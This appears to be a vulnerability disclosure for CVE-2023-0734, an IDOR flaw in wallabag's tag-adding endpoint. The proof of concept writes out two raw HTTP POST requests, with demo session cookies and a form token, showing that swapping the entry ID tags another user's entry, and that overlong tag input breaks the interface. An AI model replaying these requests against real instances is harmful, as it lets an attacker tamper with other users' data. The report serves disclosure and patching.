CVE-2023-0734: IDOR Vulnerability Allows add tag entry user other in wallabag

Description

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

Proof of Concept

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

POST /new-tag/6 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 4. Change the ID to 7, now you can add a tag to the user’s entry

POST /new-tag/7 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 5. Input value is not limited, then input character > 200 makes the interface broken

Impact

an attacker add tag by user other, interface broken